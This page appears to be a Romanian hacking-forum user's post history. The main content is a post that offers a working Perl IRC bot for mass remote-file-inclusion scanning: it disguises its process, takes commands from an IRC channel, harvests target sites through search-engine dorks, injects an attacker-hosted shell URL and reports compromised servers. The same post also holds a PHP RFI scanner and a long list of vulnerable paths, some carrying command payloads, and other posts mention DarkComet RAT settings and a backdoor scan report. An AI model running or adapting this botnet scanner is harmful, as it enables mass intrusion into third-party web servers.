Jump to content

Jimmy

Active Members
  • Posts

    984
  • Joined

  • Last visited

  • Days Won

    10

Everything posted by Jimmy

  1. A iesit havij 1.15 Oficialt site
  2. Welcome to the jungle.
  3. Antivirus results AhnLab-V3 - 2011.06.23.00 - 2011.06.22 - Backdoor/Win32.IRCBot AntiVir - 7.11.10.74 - 2011.06.22 - TR/Crypt.NSPM.Gen Antiy-AVL - 2.0.3.7 - 2011.06.22 - Backdoor/Win32.IRCBot.gen Avast - 4.8.1351.0 - 2011.06.22 - Win32:Malware-gen Avast5 - 5.0.677.0 - 2011.06.22 - Win32:Malware-gen AVG - 10.0.0.1190 - 2011.06.22 - BackDoor.Ircbot.MGC BitDefender - 7.2 - 2011.06.23 - Gen:Trojan.Heur.JP.ni0@a4sgv7ii CAT-QuickHeal - 11.00 - 2011.06.22 - Backdoor.IRCBot.oqm ClamAV - 0.97.0.0 - 2011.06.22 - - Commtouch - 5.3.2.6 - 2011.06.22 - - Comodo - 9158 - 2011.06.22 - TrojWare.Win32.Trojan.NSPM.~gen eTrust-Vet - 36.1.8401 - 2011.06.22 - - F-Prot - 4.6.2.117 - 2011.06.22 - - F-Secure - 9.0.16440.0 - 2011.06.22 - Gen:Trojan.Heur.JP.ni0@a4sgv7ii Fortinet - 4.2.257.0 - 2011.06.22 - - GData - 22 - 2011.06.22 - Gen:Trojan.Heur.JP.ni0@a4sgv7ii Ikarus - T3.1.1.104.0 - 2011.06.22 - Trojan-Dropper.Agent Jiangmin - 13.0.900 - 2011.06.22 - Backdoor/IRCBot.jzq K7AntiVirus - 9.106.4834 - 2011.06.22 - Backdoor Kaspersky - 9.0.0.837 - 2011.06.22 - Backdoor.Win32.IRCBot.oqm McAfee - 5.400.0.1158 - 2011.06.23 - Artemis!F9A4BEE6474F McAfee-GW-Edition - 2010.1D - 2011.06.22 - Heuristic.LooksLike.Win32.Suspicious.C Microsoft - 1.7000 - 2011.06.22 - Backdoor:Win32/Ursap!rts NOD32 - 6230 - 2011.06.23 - probably a variant of Win32/IRCBot.JTPYUKL nProtect - 2011-06-22.02 - 2011.06.22 - - Panda - 10.0.3.5 - 2011.06.22 - Trj/CI.A PCTools - 8.0.0.5 - 2011.06.22 - Backdoor.Trojan Prevx - 3.0 - 2011.06.23 - - Rising - 23.63.02.03 - 2011.06.22 - Trojan.Win32.Generic.11F147DD Sophos - 4.66.0 - 2011.06.22 - Sus/UnkPacker SUPERAntiSpyware - 4.40.0.1006 - 2011.06.22 - - TheHacker - 6.7.0.1.237 - 2011.06.22 - - TrendMicro - 9.200.0.1012 - 2011.06.22 - TROJ_GEN.R4FE1J3 TrendMicro-HouseCall - 9.200.0.1012 - 2011.06.23 - TROJ_GEN.R4FE1J3 VIPRE - 9662 - 2011.06.22 - Trojan.Win32.Generic!BT ViRobot - 2011.6.22.4527 - 2011.06.22 - Backdoor.Win32.S.IRCBot.214766 VirusBuster - 14.0.91.1 - 2011.06.22 - Backdoor.Ursap!AHbYMdMqMwY
  4. are TROJAN Pe bune...? Edit: Unde l-ai scanat de zici ca are trojan?
  5. Cand faci serveru" cu darkcomet debifeaza optiunea "explorer injection" si incearca din nou...
  6. Download Torrent
  7. Jimmy

    Fun stuff

  8. ai inceput cu stangul...
  9. Perl script: #!/usr/bin/perl # powered by alboss paradise @ # irc.ascnet.biz ; irc.fier1.com ; irc.securityfuckus.com # www.xshqiptaretx.org use IO::Socket::INET; use HTTP::Request; use LWP::UserAgent; #my $processo = "httpd -SascSL"; my $processo = "/usr/local/apache/bin/httpd -SascSL"; if (`ps aux` =~ /httpd -SascSL/){exit;} my $cmd="http://fucku.com/c9???"; my $server="irc.ascnet.biz"; my $porta="6667"; my $nick="[ASC]RFI[".int(rand(1000))."]"; my $canale="#asc"; my $server2="irc.ascnet.biz"; my $port2="6667"; my $verbot="6.9"; $0="$processo"."\0"x16; my $pid=fork; exit if $pid; die "Problem with fork!: $!" unless defined($pid); my $sk = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server", PeerPort=>"$porta",) or die "Cannot connect to server!\n"; $sk->autoflush(1); print $sk "NICK $nick\r\n"; print $sk "USER ASC X * :4,1irc.ascnet.biz : ALBANIAN.SECURITY.CLAN\r\n"; print $sk "JOIN $canale\r\n"; print $sk "PRIVMSG $canale :4 .:: [4,1SHELLS ( RFI ) SCANNER STARTED] 9,1 !!! !rfi IS ON !!!4 ::.\r\n"; print $sk "PRIVMSG $canale :4 .:: 9,1!!! /join #asc FOR !help ON !!!4 ::.\r\n"; while($line = <$sk>){ print $line; $line =~ s/rn$//; if ($line=~ /^PING .*)/){ print "PONG :$1"; print $sk "PONG :$1\r\n";} if ($line =~ /^.+?)!(.+?)@(.+?) PRIVMSG (.+?) .+)/) { my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; if ($args =~ /^001VERSION001$/) { stampa($sk, "NOTICE $pn :\001VERSION XChat 2.6.7 by ALBANIA\001");}} if ($line =~ m/^.+?)s+001s+(S+)s/i) { print $sk "JOIN $canale\r\n";} if ($line=~ /PRIVMSG $canale :.help/){ stampa($sk, "PRIVMSG $canale :4 .:: [4,1HELP] 9,1/join #asc FOR !help4 ::.");} if ($line=~ /PRIVMSG $canale :.info/){ my $sysos = `uname -sr`; my $uptime = `uptime`; if ($sysos =~ /freebsd/i ) { $sysname = `hostname`; $memory = `expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`; $swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`; chomp($memory); chomp($swap);} elsif ( $sysos =~ /linux/i ) { $sysname = `hostname -f`; $memory = `free -m |grep -i mem | awk '{print \$2}'`; $swap = `free -m |grep -i swap | awk '{print \$2}'`; chomp($swap); chomp($memory);} else { $sysname ="No Found";; $memory ="No found"; $swap ="No Found";} $uptime=~s/n//g; $sysname=~s/n//g; $sysos=~s/n//g; stampa($sk, "PRIVMSG $canale :4 .:: [4,1Info] 9,1IrcServer/Port:7,1 $server2 - $port24 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Info] 9,1Os/Hostname:7,1 $sysos - $sysname4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Info] 9,1Process/PID:7,1 $processo - $$4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Info] 9,1Uptime:7,1 $uptime4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Info] 9,1Memory/Swap:7,1 $memory - $swap4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Info] 9,1Perl/Bot Version:7,1 $] - $verbot4 ::.");} if ($line=~ /PRIVMSG $canale :.rfis+(.*?)s+(.*)/){ if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $bug=$1; my $dork=$2; if ($bug =~ /=/) {} else { stampa($sk, "PRIVMSG $canale :4 .:: [4,1GAY/LAMMER/NOOB/BIBA] 9,1DETECTED, U AREN'T ALOWEED TO SCANN ANYMORE OK !!! cuz u don't know...4 ::.");exit;} my $contatore=0; my ($type,$space); my %hosts; stampa($sk, "PRIVMSG $canale :4 .:: [4,1String(s)] 7,1$dork4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Path] 7,1$bug4 ::."); my @glist=&google($dork); my @mlist=&msn($dork); my @alist=&altavista($dork); my @uollist=&uol($dork); my @asklist=&ask($dork); my @ylist=&yahoo($dork); my @altlist=&alltheweb($dork); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 9,1Ok founds sites for [4,1String(s)] 7,1$dork4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 9,1Google ".scalar(@glist)." Sites!4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 9,1MsN ".scalar(@mlist)." Sites!4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 9,1Altavista ".scalar(@alist)." Sites!4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 9,1AllTheWeb ".scalar(@altlist)." Sites!4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 9,1UoL ".scalar(@uollist)." Sites!4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 9,1Yahoo ".scalar(@ylist)." Sites!4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 9,1AsK ".scalar(@asklist)." Sites!4 ::."); push(my @tot,@glist,@mlist,@uollist,@aollist,@asklist,@altlist,@ylist); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 7,1We got a totales of ".scalar(@tot)." Sites!4 ::."); my @puliti=&unici(@tot); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 7,1Cleaned Websites Founds ".scalar(@puliti)." Sites!4 ::."); my $uni=scalar(@puliti); foreach my $sito (@puliti){ $contatore++; if ($contatore %100==0){} if ($contatore==$uni-1){ stampa($sk, "PRIVMSG $canale :4 .:: [4,1.. #asc rfi scanner...] 9,1Scann Finished For [4String(s)] 7,1$dork4 ::."); stampa($sk, "PRIVMSG $canale : 4,1POWERED BY ALBOSS PARADISE @ (> IRC.ASCNET.BIZ <)");} my $test="http://".$sito.$bug.$cmd."????"; my $print="http://".$sito.$bug."http://ascnet.extra.hu/c9"."????"; my $req=HTTP::Request->new(GET=>$test); my $ua=LWP::UserAgent->new(); $ua->timeout(5); my $response=$ua->request($req); if ($response->is_success) { my $re=$response->content; if($re =~ /ALBANIA/ && $re =~ /uid=/){ #my $punked="http://www.xshqiptaretx.org/list/index.php?off=$test"; #my $poster=HTTP::Request->new(GET=>$punked); #my $resa=$ua->request($poster); my $hs=geths($print); $hosts{$hs}++; if($hosts{$hs}=="1"){ $x=os($test); stampa($sk, "PRIVMSG $canale :4 .:: [4,1SafeMode] (3 OFF ) $print 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1uname -a] (3$alb ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1uptime] (3$alb2 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1id] (3$alb3 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1pwd] (3$alb4 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1user] (3$alb9 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1phpv] (3$alb6 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1SoftWare] (3$alb5 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1ServerAddr] (3$alb7 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1ServerName] (3$alb8 ) 4::.");}} elsif($re =~ /ALBANIA/){ #my $punked1="http://www.xshqiptaretx.org/list/index.php?on=$test"; #my $poster1=HTTP::Request->new(GET=>$punked1); #my $resa=$ua->request($poster1); my $hs=geths($print); $hosts{$hs}++; if($hosts{$hs}=="1"){ $x=os($test); stampa($sk, "PRIVMSG $canale :4 .:: [4,1SafeMode] (4 ON ) $print 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1uname -a] (4$alb ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1uptime] (4$alb2 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1id] (4$alb3 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1pwd] (4$alb4 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1user] (4$alb9 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1phpv] (4$alb6 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1SoftWare] (4$alb5 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1ServerAddr] (4$alb7 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1ServerName] (4$alb8 ) 4::."); }}}}}exit;}}} sub stampa() { if ($#_ == '1') { my $sk = $_[0]; print $sk "$_[1]\n"; } else { print $sk "$_[0]\n";}} sub os(){ my $sito=$_[0]; my $Res=query($sito); while($Res=~m/<br>uname -a:(.+?)<br>/g){ $alb=$1;} while($Res=~m/<br>uptime:(.+?)<br>/g){ $alb2=$1;} while($Res=~m/<br>id:(.+?)<br>/g){ $alb3=$1;} while($Res=~m/<br>pwd:(.+?)<br>/g){ $alb4=$1;} while($Res=~m/<br>user:(.+?)<br>/g){ $alb9=$1;} while($Res=~m/<br>phpv:(.+?)<br>/g){ $alb6=$1;} while($Res=~m/<br>SoftWare:(.+?)<br>/g){ $alb5=$1;} while($Res=~m/<br>ServerAddr:(.+?)<br>/g){ $alb7=$1;} while($Res=~m/<br>ServerName:(.+?)<br>/g){ $alb8=$1;} sub google(){ my @lst; my $key = $_[0]; for($b=0;$b<=2000;$b+=100){ my $Go=("http://www.google.co.uk/search?hl=en&q=".key($key)."&btnG=&meta=&num=100&filter=0&start=".$; my $Res=query($Go); while($Res =~ m/<a href="?http:\/\/([^>\"]*)\//g){ if ($1 !~ /google/){ my $k=$1; my @grep=links($k); push(@lst,@grep);}}} return @lst;} sub altavista(){ my @lst; my $key = $_[0]; for($b=1;$b<=2000;$b+=100){ my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$; my $Res=query($AlT); while($Res=~m/<span class=ngrn>(.+?)//g){ if($1 !~ /altavista/){ my $k=$1; $k=~s/<//g; $k=~s/ //g; my @grep=links($k); push(@lst,@grep);}} if ($Res =~ /target="_self\">Succ/){} else{return @lst;}} return @lst;} sub yahoo(){ my @lst; my $key = $_[0]; for($b=1;$b<=2000;$b+=100){ my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$; my $Res=query($Ya); while($Res =~ m/**http%3a//(.+?)" >/g){ my $k=$1; $k=~s/<b>//g; $k=~s/<\/b>//g; $k=~s/<wbr>//g; my @grep=links($k); push(@lst,@grep);}} return @lst;} sub alltheweb(){ my @lst; my $key=$_[0]; my $i=0; my $pg=0; for($i=0; $i<=2000;$i+=100){ my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i); my $Res=query($all); while($Res =~ m/<span class="?resURL\"?>http:\/\/(.+?)\<\/span>/g){ my $k=$1; $k=~s/ //g; my @grep=links($k); push(@lst,@grep);}} return @lst;} sub lycos(){ my @lst; my $key = $_[0]; for($b=1;$b<=2000;$b+=100){ my $LyCoS=("http://search.lycos.com/?query=".key($key)."&page=".$i); my $Res=query($LyCoS); while ($Res=~ m/<span class="?grnLnk small\"?>http:\/\/(.+?)\//g ){ my $k=$1; if($k!~/busca|lycos|yahoo/){ my $k=$1; my @grep=links($k); push(@lst,@grep);}}} return @lst;} sub msn(){ my @lst; my $key = $_[0]; for($b=1;$b<=2000;$b+=100){ my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE"); my $Res=query($MsN); while($Res =~ m/<a href="?http:\/\/([^>\"]*)\//g){ if($1 !~ /msn|live/){ my $k=$1; my @grep=links($k); push(@lst,@grep);}} if ($Res =~ /nextPage disabled/) {return @lst;}} return @lst;} sub ask(){ my @lst; my $key=$_[0]; my $i=0; my $pg=0; for($i=0; $i<=2000;$i+=100){ my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all"); my $Res=query($Ask); while($Res=~m/<a id="(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){ my $k=$3; $k=~s/[\"\ ]//g; my @grep=links($k); push(@lst,@grep);}} return @lst;} sub uol(){ my @lst; my $key = $_[0]; for($b=1;$b<=2000;$b+=100){ my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i); my $Res=query($UoL); while($Res =~ m/<a href="http:\/\/([^>\"]*)/g){ my $k=$1; if($k!~/busca|uol|yahoo/){ my $k=$1; my @grep=links($k); push(@lst,@grep);}}} return @lst;} sub links(){ my @l; my $link=$_[0]; my $host=$_[0]; my $hdir=$_[0]; $hdir=~s/(.*)\/[^\/]*$/\1/; $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; $host.="/"; $link.="/"; $hdir.="/"; $host=~s/\/\//\//g; $hdir=~s/\/\//\//g; $link=~s/\/\//\//g; push(@l,$link,$host,$hdir); return @l;} sub geths(){ my $host=$_[0]; $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; return $host;} sub key(){ my $chiave=$_[0]; $chiave =~ s/ /\+/g; $chiave =~ s/:/\%3A/g; $chiave =~ s/\//\%2F/g; $chiave =~ s/&/\%26/g; $chiave =~ s/\"/\%22/g; $chiave =~ s/,/\%2C/g; $chiave =~ s/\\/\%5C/g; return $chiave;} sub query($){ my $url=$_[0]; $url=~s/http:\/\///; my $host=$url; my $query=$url; my $page=""; $host=~s/href=\"?http:\/\///; $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query=~s/$host//; if ($query eq "") {$query="/";}; eval{ my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; print $sock "GET $query HTTP/1.0rnHost: $hostrnAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; my @r = <$sock>; $page="@r"; close($sock);}; return $page;} sub unici{ my @unici = (); my %visti = (); foreach my $elemento ( @_ ){ next if $visti{ $elemento }++; push @unici, $elemento;} return @unici;}} # powered by alboss paradise @ # irc.ascnet.biz ; irc.fier1.com ; irc.securityfuckus.com # www.xshqiptaretx.org Php script: <?php /*************************************************************************** * PHP Evil RFI Scanner v1.2 * * * * Copyright (C) 2007 by evilsocket * * * * http://www.evilsocket.net * * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * * This program is distributed in the hope that it will be useful, * * but WITHOUT ANY WARRANTY; without even the implied warranty of * * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * * GNU General Public License for more details. * * * * You should have received a copy of the GNU General Public License * * along with this program; if not, write to the * * Free Software Foundation, Inc., * * 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * * ***************************************************************************/ /* regex per individuare le inclusioni */ $escan_inc_regex = array( '/include(_once)?.\$/ix', '/require(_once)?.\$/ix' ) ; /* regex per estrarre il nome delle variabili */ $escan_var_regex = array( '/\Ainclude(_once)?./is', '/\Arequire(_once)?./is' ) ; /* array di estensioni dei file da scansionare */ $escan_valid_ext = array( 'php' ); /* massima grandezza di un file da scansionare, se 0 scansiona tutti */ $escan_max_size = 0; /* contatore delle directory scansionate */ $escan_dir_count = 0; /* contatore dei file scansionati */ $escan_file_count = 0; /* contatore dei potenziali rfi trovati */ $escan_match_count = 0; /* contatore dei bytes totali scansionati */ $escan_byte_count = 0; escan_banner(); if( $argc < 2 ){ escan_usage($argv[0]); } else{ $stime = escan_get_mtime(); escan_recurse_dir( realpath($argv[1]).DIRECTORY_SEPARATOR ); $etime = escan_get_mtime(); print "\n@ Scan report : \n\n" . "\t$escan_dir_count directory .\n". "\t$escan_file_count file .\n". "\t" . escan_format_size($escan_byte_count) . " .\n". "\t$escan_match_count potenziali RFI .\n". "\t".($etime-$stime) . " secondi di elaborazione .\n\n"; } /* formatta in una stringa una grandezza espressa in bytes */ function escan_format_size($bytes) { if( $bytes < 1024 ) return "$bytes bytes"; if( $bytes < 1048576 ) return ($bytes / 1024) . " Kb"; if( $bytes < 1073741824 ) return ($bytes / 1048576) . " Mb"; return ($bytes / 1073741824) . " Gb"; } /* restituisce il timestamp espresso in secondi */ function escan_get_mtime() { list($usec, $sec) = explode(" ",microtime()); return ((float)$usec + (float)$sec); } /* estrae la linea di codice dell inclusione */ function escan_scan_line($content,$offset) { list( $line, $dummy ) = explode( ";" , substr($content,$offset,strlen($c ontent)) ); return $line.";"; } /* estrae il nome della variabile dalla riga di codice dell inclusione */ function escan_parse_var( $line, $regex_id ) { global $escan_var_regex; $vars = preg_split($escan_var_regex[$regex_id],$line); $varname = $vars[1]; $delimiters = " .);"; for( $i = 0; $i < strlen($varname); $i++ ){ for( $j = 0; $j < strlen($delimiters); $j++ ){ if($varname[$i] == $delimiters[$j]){ return substr( $varname, 0, $i ); } } } return $varname; } /* controlla se la variabile $var viene definita in $content prima della posizio ne $offset */ function escan_check_definitions($content,$offset,$var) { if( strpos( $var, "->" ) ){ return 1; } $chunk = substr($content,0,$offset); $regex = "/".preg_quote($var,"/")."\s*=/ix"; preg_match( $regex, $chunk,$matches ); return count($matches); } /* parserizza il file $file per controllare la presenza di potenziali rfi */ function escan_parse_file($file) { global $escan_inc_regex; global $escan_max_size; global $escan_file_count; global $escan_match_count; global $escan_byte_count; $fsize = filesize($file); if( $escan_max_size && $fsize > $escan_max_size ) return; $escan_file_count++; $escan_byte_count += $fsize; $content = @file_get_contents($file); for( $i = 0; $i < count($escan_inc_regex); $i++ ){ if( preg_match_all( $escan_inc_regex[$i], $content, $matches, PR EG_OFFSET_CAPTURE ) ){ $nmatch = count($matches[0]); for( $j = 0; $j < $nmatch; $j++ ){ $offset = $matches[0][$j][1]; $line = escan_scan_line($content,$offset); $var = escan_parse_var($line,$i); if( escan_check_definitions($content,$offset,$var) == 0 ) { $escan_match_count++; print "@ $file - \n\t- '$var' alla posizione $offset .\n"{ ; } } } } } } /* restituisce l'estensione del file $fname */ function escan_get_file_ext($fname) { if( strchr($fname,'.') ){ return substr($fname,strrpos($fname,'.')+1); } else{ return ""; } } /* controlla se il file $fname è di un estensione valida */ function escan_isvalid_ext($fname) { global $escan_valid_ext; for( $i = 0; $i < count($escan_valid_ext); $i++ ){ if(strstr(escan_get_file_ext($fname),$escan_valid_ext[$i])){ return true; } } return false; } /* funzione che scansiona ricorsivamente le directory */ function escan_recurse_dir($dir) { global $escan_dir_count; $escan_dir_count++; if( $cdir = @dir($dir) ){ while( $entry = $cdir->read() ){ if( $entry != '.' && $entry != '..' ){ if( is_dir($dir.$entry) ){ escan_recurse_dir($dir.$entry.DIRECTORY_SEPARATOR); } else{ if( escan_isvalid_ext($dir.$entry) ){ escan_parse_file($dir.$entry); } } } } $cdir->close(); } } function escan_banner() { print "*-----------------------------------------------*\n" . "* PHP Evil RFI Scanner v1.2 by evilsocket *\n" . "* *\n" . "* http://www.evilsocket.net *\n" . "*-----------------------------------------------*\n\n"; } function escan_usage($pname) { print "Uso : php $pname <dir>\n"; } ?> Dorks RFI /includes/header.php?systempath= /Gallery/displayCategory.php?basepath= /index.inc.php?PATH_Includes= /nphp/nphpd.php?nphp_config[LangFile]= /include/db.php?GLOBALS[rootdp]= /ashnews.php?pathtoashnews= /ashheadlines.php?pathtoashnews= /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= /demo/includes/init.php?user_inc= /jaf/index.php?show= /inc/shows.inc.php?cutepath= /poll/admin/common.inc.php?base_path= /pollvote/pollvote.php?pollname= /sources/post.php?fil_config= /modules/My_eGallery/public/displayCategory.php?basepath= /bb_lib/checkdb.inc.php?libpach= /include/livre_include.php?no_connect=lol&chem_absolu= /index.php?from_market=Y&pageurl= /modules/mod_mainmenu.php?mosConfig_absolute_path= /pivot/modules/module_db.php?pivot_path= /modules/4nAlbum/public/displayCategory.php?basepath= /derniers_commentaires.php?rep= /modules/coppermine/themes/default/theme.php?THEME_DIR= /modules/coppermine/include/init.inc.php?CPG_M_DIR= /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= /coppermine/themes/maze/theme.php?THEME_DIR= /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]= /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]= /myPHPCalendar/admin.php?cal_dir= /agendax/addevent.inc.php?agendax_path= /modules/mod_mainmenu.php?mosConfig_absolute_path= /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= /main.php?page= /default.php?page= /index.php?action= /index1.php?p= /index2.php?x= /index2.php?content= /index.php?conteudo= /index.php?cat= /include/new-visitor.inc.php?lvc_include_dir= /modules/agendax/addevent.inc.php?agendax_path= /shoutbox/expanded.php?conf= /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= /pivot/modules/module_db.php?pivot_path= /library/editor/editor.php?root= /library/lib.php?root= /e107/e107_handlers/secure_img_render.php?p= /zentrack/index.php?configFile= /main.php?x= /becommunity/community/index.php?pageurl= /GradeMap/index.php?page= /phpopenchat/contrib/yabbse/poc.php?sourcedir=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps (www.google.com => intitle:PHPOpenChat exthp) /calendar/calendar.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps /calendar/functions/popup.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps /calendar/events/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps /calendar/events/datePicker.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps /calendar/setup/setupSQL.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps /calendar/setup/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps (www.google.com => intitle:"EasyPHPCalendar" exthp) /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= /zentrack/index.php?configFile= /pivot/modules/module_db.php?pivot_path= /inc/header.php/step_one.php?server_inc= /install/index.php?lng=../../include/main.inc&G_PATH= /inc/pipe.php?HCL_path= /include/write.php?dir= /include/new-visitor.inc.php?lvc_include_dir= /includes/header.php?systempath= /support/mailling/maillist/inc/initdb.php?absolute_path= /coppercop/theme.php?THEME_DIR= /zentrack/index.php?configFile= /pivot/modules/module_db.php?pivot_path= /inc/header.php/step_one.php?server_inc= /install/index.php?lng=../../include/main.inc&G_PATH= /inc/pipe.php?HCL_path= /include/write.php?dir= /include/new-visitor.inc.php?lvc_include_dir= /includes/header.php?systempath= /support/mailling/maillist/inc/initdb.php?absolute_path= /coppercop/theme.php?THEME_DIR= /becommunity/community/index.php?pageurl= /shoutbox/expanded.php?conf= /agendax/addevent.inc.php?agendax_path= /myPHPCalendar/admin.php?cal_dir= /yabbse/Sources/Packages.php?sourcedir= /zboard/zboard.php /path_of_cpcommerce/_functions.php?prefix /dotproject/modules/projects/addedit.php?root_dir= /dotproject/modules/projects/view.php?root_dir= /dotproject/modules/projects/vw_files.php?root_dir= /dotproject/modules/tasks/addedit.php?root_dir= /dotproject/modules/tasks/viewgantt.php?root_dir= /My_eGallery/public/displayCategory.php?basepath= /modules/My_eGallery/public/displayCategory.php?basepath= /modules/4nAlbum/public/displayCategory.php?basepath= /modules/coppermine/themes/default/theme.php?THEME_DIR= /modules/agendax/addevent.inc.php?agendax_path= /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= /modules/coppermine/include/init.inc.php?CPG_M_DIR= /modules/mod_mainmenu.php?mosConfig_absolute_path= /shoutbox/expanded.php?conf= /pivot/modules/module_db.php?pivot_path= /library/editor/editor.php?root= /library/lib.php?root= /e107/e107_handlers/secure_img_render.php?p= /main.php?x= /main.php?page= /default.php?page= /index.php?meio.php= /index.php?include= | /index.php?inc= | /index.php?page= | /index.php?pag= | /index.php?p= /index.php?x= | /index.php?open= | /index.php?open= | /index.php?visualizar= | /index.php?pagina= /index.php?content= | /index.php?cont= | /index.php?c= | /index.php?meio= | /index.php?x= /index.php?cat= | /index.php?site= /index.php?configFile= | /index.php?action= | /index.php?do= /index2.php?x= | /index2.php?content= | /template.php?pagina= | /inc/step_one_tables.php?server_inc= /GradeMap/index.php?page= | /phpshop/index.php?base_dir= | /admin.php?cal_dir= /path_of_cpcommerce/_functions.php?prefix= | /contacts.php?cal_dir= | /convert-date.php?cal_dir= /album_portal.php?phpbb_root_path= /mainfile.php?MAIN_PATH= /dotproject/modules/files/index_table.php?root_dir= /html/affich.php?base= /gallery/init.php?HTTP_POST_VARS= /pm/lib.inc.php?pm_path= /ideabox/include.php?gorumDir= index2.php?includes_dir= forums/toplist.php?phpbb_root_path= forum/toplist.php?phpbb_root_path= admin/config_settings.tpl.php?include_path= include/common.php?include_path= event/index.php?page= forum/index.php?includeFooter= forums/index.php?includeFooter= forum/bb_admin.php?includeFooter= forums/bb_admin.php?includeFooter= language/lang_english/lang_activity.php?phpbb_root_path= forum/language/lang_english/lang_activity.php?phpbb_root_path= blend_data/blend_common.php?phpbb_root_path= master.php?root_path= includes/kb_constants.php?module_root_path= forum/includes/kb_constants.php?module_root_path= forums/includes/kb_constants.php?module_root_path= classes/adodbt/sql.php?classes_dir= agenda.php3?rootagenda= agenda2.php3?rootagenda= sources/lostpw.php?CONFIG[path]= topsites/sources/lostpw.php?CONFIG[path]= toplist/sources/lostpw.php?CONFIG[path]= sources/join.php?CONFIG[path]= topsites/sources/join.php?CONFIG[path]= toplist/sources/join.php?CONFIG[path]= topsite/sources/join.php?CONFIG[path]= public_includes/pub_popup/popup_finduser.php?vsDragonRootPath= extras/poll/poll.php?file_newsportal= index.php?site_path= mail/index.php?site_path= fclick/show.php?path= show.php?path= calogic/reconfig.php?GLOBALS[CLPath]= eshow.php?Config_rootdir= auction/auction_common.php?phpbb_root_path= index.php?inc_dir= calendar/index.php?inc_dir= modules/TotalCalendar/index.php?inc_dir= modules/calendar/index.php?inc_dir= calendar/embed/day.php?path= ACalendar/embed/day.php?path= calendar/add_event.php?inc_dir= claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys= claroline/auth/ldap/authldap.php?includePath= docebo/modules/credits/help.php?lang= modules/credits/help.php?lang= config.php?returnpath= editsite.php?returnpath= in.php?returnpath= addsite.php?returnpath= includes/pafiledb_constants.php?module_root_path= 